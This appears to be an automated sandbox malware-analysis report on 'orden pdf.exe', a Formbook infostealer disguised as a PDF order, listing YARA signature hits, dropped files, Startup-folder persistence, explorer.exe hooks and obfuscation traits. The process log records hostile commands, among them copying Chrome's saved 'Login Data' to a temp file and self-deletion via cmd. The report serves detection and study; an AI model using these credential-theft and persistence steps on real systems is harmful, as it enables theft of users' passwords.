Source: orden pdf.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
Yara signature match
Source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.url, type: DROPPED Matched rule: Methodology_Suspicious_Shortcut_Local_URL author = @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson), description = Detects local script usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 2.2.orden pdf.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.orden pdf.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.orden pdf.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.orden pdf.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.orden pdf.exe.39e0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.orden pdf.exe.39e0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.orden pdf.exe.39e0000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.orden pdf.exe.39e0000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@217/11@9/3
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001BCE7A GetLastError,FormatMessageW, 0_2_001BCE7A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001AAB84 AdjustTokenPrivileges,CloseHandle, 0_2_001AAB84
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001AB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_001AB134
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001AAB84 AdjustTokenPrivileges,CloseHandle, 1_2_001AAB84
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001AB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 1_2_001AB134
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001BE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_001BE1FD
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001B6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle, 0_2_001B6532
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001CC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket, 0_2_001CC18C
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0017406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_0017406B
Source: C:\Windows\explorer.exe File created: C:\Program Files (x86)\Fxpx
Source: C:\Users\user\Desktop\orden pdf.exe File created: C:\Users\user\assignedaccessproviderevents
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6192:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1720:120:WilError_01
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\Fxpx
Source: unknown Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\assignedaccessproviderevents\.vbs'
Source: orden pdf.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\orden pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\systray.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: orden pdf.exe Virustotal: Detection: 50%
Source: orden pdf.exe ReversingLabs: Detection: 32%
Source: C:\Users\user\Desktop\orden pdf.exe File read: C:\Users\user\Desktop\orden pdf.exe
Source: unknown Process created: C:\Users\user\Desktop\orden pdf.exe 'C:\Users\user\Desktop\orden pdf.exe'
Source: unknown Process created: C:\Users\user\Desktop\orden pdf.exe C:\Users\user\Desktop\orden pdf.exe
Source: unknown Process created: C:\Users\user\Desktop\orden pdf.exe C:\Users\user\Desktop\orden pdf.exe
Source: unknown Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\assignedaccessproviderevents\.vbs'
Source: unknown Process created: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe 'C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe'
Source: unknown Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\orden pdf.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe
Source: C:\Users\user\Desktop\orden pdf.exe Process created: C:\Users\user\Desktop\orden pdf.exe C:\Users\user\Desktop\orden pdf.exe
Source: C:\Users\user\Desktop\orden pdf.exe Process created: C:\Users\user\Desktop\orden pdf.exe C:\Users\user\Desktop\orden pdf.exe
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe 'C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe'
Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\orden pdf.exe'
Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\InProcServer32
Source: C:\Windows\SysWOW64\systray.exe File written: C:\Users\user\AppData\Roaming\KN26O6T1\KN2logri.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\systray.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: orden pdf.exe Static file information: File size 1550336 > 1048576
Source: orden pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: orden pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: orden pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: orden pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: orden pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: orden pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: orden pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: systray.pdb source: orden pdf.exe, 00000002.00000002.300200826.0000000001730000.00000040.00000001.sdmp
Source: Binary string: systray.pdbGCTL source: orden pdf.exe, 00000002.00000002.300200826.0000000001730000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: orden pdf.exe, 00000002.00000002.300447868.000000000185F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: orden pdf.exe
Source: orden pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: orden pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: orden pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: orden pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: orden pdf.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0018E01E LoadLibraryA,GetProcAddress, 0_2_0018E01E
PE file contains an invalid checksum
Source: DeviceCensus.exe.exe.0.dr Static PE information: real checksum: 0x12169b should be: 0x18746f
Source: cx9l_rq2dula.exe.3.dr Static PE information: real checksum: 0x12169b should be: 0x18746f
Source: orden pdf.exe Static PE information: real checksum: 0x12169b should be: 0x18746f
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0018288B push 66001823h; retn 001Eh 0_2_001828E1
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_00196B05 push ecx; ret 0_2_00196B18
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_0018288B push 66001823h; retn 001Eh 1_2_001828E1
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_00196B05 push ecx; ret 1_2_00196B18
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0041681F push eax; retf 2_2_00416820
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_00417BCB push ecx; ret 2_2_00417BD4
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0041C6C5 push eax; ret 2_2_0041C718
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0041C77C push eax; ret 2_2_0041C782
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0041C712 push eax; ret 2_2_0041C718
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_0041C71B push eax; ret 2_2_0041C782
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 2_2_017BD0D1 push ecx; ret 2_2_017BD0E4
Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe Code function: 5_2_01396B05 push ecx; ret 5_2_01396B18

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\orden pdf.exe File created: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe
Source: C:\Windows\explorer.exe File created: C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\Fxpx\cx9l_rq2dula.exe

Boot Survival:

Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\Desktop\orden pdf.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.url
Stores files to the Windows start menu directory
Source: C:\Users\user\Desktop\orden pdf.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.url

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x93 0x37
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001D8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_001D8111
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0018EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_0018EB42
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001D8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 1_2_001D8111
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_0018EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 1_2_0018EB42
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_0019123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0019123A
Source: C:\Users\user\Desktop\orden pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\orden pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
